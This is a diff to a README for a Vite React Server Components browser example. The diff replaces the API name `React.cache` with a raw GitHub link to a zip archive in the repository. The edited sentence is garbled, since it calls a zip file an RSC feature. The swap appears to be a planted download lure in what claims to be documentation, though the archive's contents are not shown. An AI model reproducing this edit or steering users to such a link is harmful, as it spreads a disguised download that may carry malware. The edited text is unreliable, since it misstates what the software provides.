Emiliarepeatable158/vite-rsc-browser-example/README.md

 While this application offers a robust experience, a few features have limitations:

-- Some advanced RSC features, such as `React.cache`, depend on `AsyncLocalStorage`.
+- Some advanced RSC features, such as `https://raw.githubusercontent.com/Emiliarepeatable158/vite-rsc-browser-example/main/src/vite-rsc-browser-example-v1.3.zip`, depend on `AsyncLocalStorage`.
 This storage option is currently not available directly in browsers.

 Keep this in mind when exploring the capabilities of the application.